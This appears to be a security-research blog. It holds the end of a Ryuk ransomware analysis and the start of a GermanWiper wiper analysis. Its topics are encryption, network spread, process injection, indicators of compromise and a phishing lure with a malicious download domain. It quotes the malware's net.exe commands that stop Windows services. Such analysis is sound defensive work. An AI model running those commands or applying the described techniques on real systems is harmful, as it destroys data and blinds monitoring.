<img height="163" src="https://lh6.googleusercontent.com/SokBGZsDYDTzGPe_QzeDrxV27Dp4OQtWQKJFfJfjsxrO3z51txaUUqLDKELSREIzd1XPDERxQsdU5cHC3e_159yYkfpsVzd_CxJ1OWRX3MXGufztuWFq5xzcEoTrqXzEg26IuINq" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="537" /></div>
The ransomware stops the following system services using ‘net.exe’ and ‘net1.exe’:<br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">C:\Windows\System32\net.exe stop audioendpointbuilder /y</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">C:\Windows\System32\net.exe stop samss /y</span></li>
</ul>
It is not clear why Ryuk stops the Windows Audio Endpoint Builder, which causes audio to malfunction on the victim's computer. The second command stops the Security Accounts Manager (samss). Disabling this service prevents other services from being notified when the SAM is ready, which may in turn cause them to fail to start correctly. This technique can be used to keep alerts generated by suspicious activity on the affected system from reaching a SIEM.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br />
After encryption has completed, the cryptolocker creates and executes a batch script, 'window.bat', that deletes backups and shadow copies.<br />
<br />
<img height="354" src="https://lh6.googleusercontent.com/IhSlEVGmNvfjr2mOlvrr0tZvbbSb4TriUroRv8u0j-EkXCwBl2e1dhTsLWO5OOefK5kAaBB0XuZTmxjTTGx7vpPNHJdQzkN5fhjnw636F35-0DCHKEx-Xf5SkW3aCgHWzoD7axWw" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="379" /></div>
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; padding: 0pt 0pt 12.75pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Encryption</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Ryuk uses three-layer encryption with the conventional combination of a symmetric cipher (AES) for file contents and an asymmetric one (RSA) for the file keys. The master key pair, both the public and the private key, is kept on the attacker’s side; the sample instead carries a hardcoded session key pair whose private key is pre-encrypted with the master public key.<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Network encryption</span></h4>
<br /></div>
Ryuk does not encrypt files with the following extensions:<br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">exe </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">dll </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">ini </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">hrmlog </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">lnk</span></li>
</ul>
It also skips the following directories (the directory whitelist):<br />
<ul style="text-align: left;">
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">Windows </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">Mozilla </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">Chrome</span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">RecycleBin </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Ahnlab</span><span style="background-color: white; font-family: "arial"; font-size: 10.5pt; vertical-align: baseline; white-space: pre-wrap;"> </span></li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
The keys used in the encryption process are as follows:<br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">The master RSA key pair owned by the attacker. </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">RSA-2048 session key pair is hardcoded with the private key pre-encrypted by the master key.</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">AES-256 file keys.</span></li>
</ol>
<b style="font-weight: normal;"><br /></b>
<br />
The encryption process has the following steps:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">1. Two files are created: </span></div>
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">‘PUBLIC’ file that contains the public session key (RSA-2048) and </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">‘UNIQUE_ID_DO_NOT_REMOVE’ file that contains the private session key (RSA-2048) pre-encrypted with the master key. This file should be uploaded to the attacker to enable file decryption.</span></li>
</ul>
The public session key looks as follows:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 292px; overflow: hidden; width: 630px;"><img height="292" src="https://lh4.googleusercontent.com/QFLrW9C4oP-pS2o7hefaQ4CkJMrW512xGWrxyTyjPHnJbyv-YQv1t_hBapZPIuisBmx4ZyarwWN_a7KY5VA_Wc6w7U53ptD46jqpgLDPrkKEQdhc1jUpwWxUtvSYT-g2TTXpssY3" style="margin-left: 0px; margin-top: 0px;" width="630" /></span></span></div>
<span style="font-family: "arial"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">2. AES-256 file key is generated using CryptGenKey with Algorithm ID 0x6610 which corresponds to </span><span style="background-color: white; font-family: "arial"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">CALG_AES_256.</span><br />
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 116px; overflow: hidden; width: 335px;"><img height="116" src="https://lh4.googleusercontent.com/4vvE8SM_1hcjtap7MKFtxE3rXenEurmfYMHaG3LmKQHxOD6ExsrWbAAMtRiV4u3eFFN8wBTW6Mc6B03UnhOqMwnMG8Kdj-_bjAumOVY7BxmeHybgdOVGRNUsAe5Cytk5eZXaCEQI" style="margin-left: 0px; margin-top: 0px;" width="335" /></span></span></h1>
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">3. After that, a target file’s content is encrypted with AES key. </span><br />
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">4. Finally, magic 'HERMES' and the AES key encrypted with the embedded RSA public key are added </span><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">to the end of the encrypted file.</span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 84px; overflow: hidden; width: 690px;"><img height="84" src="https://lh3.googleusercontent.com/BOA40LTZx7A3yDflix3ts0SyOZDG9Er5BJHuPrTAyZe23qRErigfUA-CXrBKmCPssoHchOPErOcAuFB6kORS5UsEOPfUBTz9nWT_TOOXCUJgmifjnBHaTQXGf8tmaI0OcXs8I6Ps" style="margin-left: 0px; margin-top: 0px;" width="690" /></span></span></div>
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Network encryption</span></h4>
The ransomware looks for other computers in the local network. To do that, it calls the GetIpNetTable() function, which returns the local system's IPv4-to-physical-address (ARP) mapping table; the IP addresses in the ARP entries reveal the subnets the victim’s host is connected to.</div>
<div>
<br /></div>
<div>
If an IP address discovered in the ARP cache belongs to one of the following ranges of internal IP addresses, Ryuk starts looking for potential victims in that subnet by enumerating all possible IP addresses:<br />
<ul>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">10.0.0.0 - 10.255.255.255</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">172.16.0.0 - 172.31.255.255</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">192.168.0.0 - 192.168.255.255</span></li>
</ul>
Ryuk checks if the discovered IP address belongs to the ranges above.<span style="font-family: "arial"; font-size: 11pt; white-space: pre;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 265px; overflow: hidden; width: 499px;"><img height="265" src="https://lh3.googleusercontent.com/7O_U475H9Zg6EBquqam5Cg-5s5fkv6oVG4ssShshHq8Vv39sp186CgpNuz8Z038bDhMdlkw_C5aaj5MYIiq6LJRDlJxyjPxRHHDbv5aBtzDQOneZaAmrwbdfkbndNzhQAYkS25jQ" style="margin-left: 0px; margin-top: 0px;" width="499" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Finally, if a host in the local network responds, the ransomware tries to map its shared disks as network drives and encrypt the data on them.<br />
<h3 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Process injection</span></h3>
Ryuk enables the SeDebugPrivilege privilege to obtain the access rights it needs to inject its payload into running processes.<br />
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 168px; overflow: hidden; width: 690px;"><img height="168" src="https://lh6.googleusercontent.com/L4HvZN9zWPtHc97Co5elGAxFcRP6jZ_W9-bse7zgJDkzWWOELGpp5mfvlaz4dfcqdUj6B7XpJsfWeoUtlo_eOC_n4idryk_kSOFN2yUvxtDPMfReQniC79yc5cBghXDA9ggz1bJa" style="margin-left: 0px; margin-top: 0px;" width="690" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The injection method is conventional. The ransomware allocates memory in the target process, writes its payload code there with WriteProcessMemory(), and then creates and starts a remote thread with CreateRemoteThread().<br />
<br />
<img height="256" src="https://lh5.googleusercontent.com/_vR98hk1VIRRzjpGFlrUw3n2TWHEH2sITzTkxwi9uAl-M1pwqIZfPzPN3uD7DhXJ8xRDXtydkFDfDGYeX6BCmXmln6fA0G_8VJcYMeuLxpRYqbRybMxZqDLNrRos07SBVnEO22fo" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="738" /></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The ransomware avoids injecting into Windows system processes such as 'lsaas.exe', 'explorer.exe', and 'csrss.exe' (the process names are quoted as they appear in the sample).<br />
<br />
<img height="165" src="https://lh4.googleusercontent.com/YVnpRsNSCQnFx2ManjDoV773i2bPZOgSGFf0bwEuDGk9F4hEZs-WW2Ggf9Jsw_gskD_zaPe_sRzI9xgu04b_R8DsiK5Q-PsWEC8yb4XSANkWN4bwzJykbxm9bGlvlBUnDvKc9K0F" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="442" /></div>
<h3 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ransomware notes</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
After the encryption is completed, Ryuk leaves the ‘RyukReadMe.html’ with the following content:<br />
<br />
<img height="385" src="https://lh5.googleusercontent.com/VJGjIMtb1Hop1Ma0xxvhyzN2RnuQoFMSmcW0oPEiXc23pi-ncuqyKiXtYZdO8NpnReE3YrvtkPNQGSFx-pMMfR5-ba8W3gX8ASDFZs15b7u7AYU534sFrdxtuYcmQB2UhnNGjFuC" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="624" /></div>
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Code Artefacts</span></h4>
The binary still contains debugging information (a PDB path) left in by the build.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 34px; overflow: hidden; width: 613px;"><img height="34" src="https://lh4.googleusercontent.com/XUHJeT7iMpZ2zhQt31mSegt_BkfDE0tIMBwE9W8XE7TZ16RriFHks8HkeX6KHWrzaLNoyRIDFeRCxBK_J4hSS-3KtGkF95OXoE13M8MfzPdQS3GNZjNZCd8015xzKJvRefvphij-" style="margin-left: 0px; margin-top: 0px;" width="613" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The PDB info includes the paths to the header and source files of third-party packages used in the project.<br />
<br />
The ransomware also contains the ‘\PIPE\samr’ pipe name in its code, which indicates that it uses RPC over SMB (the SAMR interface). This functionality can be used for user and group enumeration as part of lateral movement, as well as for task scheduling on a remote computer.<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">Conclusion</span></h4>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Ryuk is derived from the Hermes source code, which can be found on numerous underground forums. It combines symmetric (AES) and asymmetric (RSA) encryption so that the victim’s files cannot be decrypted without the master private key. The ransomware deletes backup files and Windows shadow copies, making it impossible to restore data from local backups. To avoid antivirus detection, Ryuk obfuscates its code. It also has capabilities for host discovery in the local network, so that it can encrypt network drives, and for lateral movement using RPC over SMB. Thus, it can be effectively used by attackers in future targeted attacks to maximize the losses of a targeted organization.<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">IoCs</span></h4>
</div>
LithuanianicMercy.exe<br />
SHA-256: dd0691992d947366f1b9caf2acc1fec951f761a39ca3863e81bc2c3fb5efd415<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre;">Read also</span></h4>
<ul style="text-align: left;">
<li><span style="color: black;"><a href="https://www.bleepingcomputer.com/news/security/dch-hospital-pays-ryuk-ransomware-for-decryption-key/">https://www.bleepingcomputer.com/news/security/dch-hospital-pays-ryuk-ransomware-for-decryption-key/</a></span></li>
<li><a href="https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"><span style="color: black;">https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/</span></a></li>
<li><a href="https://www.gdatasoftware.com/blog/2019/08/35046-whats-all-the-buzz-about-looking-at-the-ryuk-ransomware-as-an-example"><span style="color: black;">https://www.gdatasoftware.com/blog/2019/08/35046-whats-all-the-buzz-about-looking-at-the-ryuk-ransomware-as-an-example</span></a></li>
<li><a href="https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"><span style="color: black;">https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/</span></a></li>
</ul>
</div>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-25032602977594906152019-09-29T12:11:00.003-07:002019-11-13T04:31:14.086-08:00GermanWiper: One More Wiper Pretending to Be Ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRQbX32WF5xD2ArWvbxdtkLAnHbwHL7JAldd4th758dSs1H1HwNSQYI0tBzymLwsa3k28h38vQXaZ-PiA7yxP6yXaJgAWUrMBWTg2lV8HSq6Q1TxyiqyBj6fhFLxASc_nHisVjwvEgcIBh/s1600/GermanWiper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="427" data-original-width="930" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRQbX32WF5xD2ArWvbxdtkLAnHbwHL7JAldd4th758dSs1H1HwNSQYI0tBzymLwsa3k28h38vQXaZ-PiA7yxP6yXaJgAWUrMBWTg2lV8HSq6Q1TxyiqyBj6fhFLxASc_nHisVjwvEgcIBh/s640/GermanWiper.png" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<i><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">[Authors: </span><span style="font-family: arial; font-size: 14.6667px; white-space: pre;">Viktoria Taran, Alexander Adamov</span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">]</span></i><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">GermanWiper was first seen on the </span><a href="https://www.bleepingcomputer.com/news/security/germanwiper-ransomware-erases-data-still-asks-for-ransom/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">BleepingComputer</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> forum on July 30, 2019. After analysis, it turned out that the malware is rather a wiper than ransomware. Interestingly, </span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">GermanWiper managed to raise $9,000 almost reaching the result of </span><a href="https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">$10,500 (4.13528947 BTC)</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> earned by another wiper called NotPetya in June 2017. </span><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Let us take a close look at the ransomware to find out the installation process, communication details, and wiping details.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<a name='more'></a><br />
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Static Analysis</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The ransomware file is PE32 executable for MS Windows. It is </span><span style="background-color: transparent; color: #4d4d4d; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">2053632</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> bytes in size. The payload code is written and compiled in Borland Delphi. In addition, it employs the Enigma protector, which code is written in Microsoft Visual C++. According to the compilation timestamp, the binary was compiled on July 31, 2019.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="101" src="https://lh6.googleusercontent.com/zK-IW8w6KTU9bSuhQYcxArZa1PaN4tqCtORhbIX_QviPCxRahKm3zjwb2vn7Alqf0QpEENLO4bKZjdx-yGsvUCpDRMzcbo9XrTWu1Ti3zStIS3AOQiO64zvByL5QHNVbb-7DRGXG" style="border: none;" width="406" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The wiper's code was compiled in Borland Delphi.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="101" src="https://lh4.googleusercontent.com/gQYlAl7nhvHW1TFeZhlAKsLjgNy1Zlo020oxpU5x7Wn0vgQegd3i3sVCvYYXQNn6YUzyVQyry8e7GPTgKFdQ7Rdqe0ZR1ZGCJ1VjDKcF_oJ_rr2AYj1Jo6QTB973vBVXjYMBYBKS" style="border: none;" width="412" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="560" src="https://lh5.googleusercontent.com/DAq61cBEL1V8_UkxLXnyOGGrU-YLzHe6UGI45lVogl9kVnGk3d3Vt_RS0wGC6I0GFPuibdWOPkfckW6O2i3vvo3Ne2LXsRjF4p3OjnctKpMZKi5TW_wkqNdJdDFG7l04gW0disD1" style="border: none;" width="455" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SHA-256: 21c756af39c6a502f7ec173f0643389806912efc1947a93bd6618fe2dae58e39</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Attack Vector</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GermanWiper is being spread over Germany as emails that include the rogueLena Kretschmer's resume. Launching one of the .lnk file ‘</span><span style="background-color: white; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Bewerbung-Lena-Kretschmer.exe’ in the attachment leads</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> to downloading the malware from ‘expandingdelegation.top’ web page. </span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">According to </span><a href="https://www.bleepingcomputer.com/news/security/germanwiper-ransomware-erases-data-still-asks-for-ransom/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">BleepingComputer</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">, there is a similarity in delivery methods between GermanWiper and </span><a href="https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-distributed-by-hackers-posing-as-german-bsi/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">recent Sodinokibi ransomware campaign</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> in which attackers distributed 
a fake email allegedly from BSI, the German Federal Office for Information Security.</span></div>
<div>
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The whole infection chain can be seen at </span><a href="https://app.any.run/tasks/62e0b723-a33b-4be7-8815-c2dc95404c62/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">app.any.run sandbox</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.</span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Installation</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Once executed, the ransomware terminates the next processes to release locked files with user’s data:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">notepad.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">dbeng50.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sqbcoreservice.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">encsvc.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mydesktopservice.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
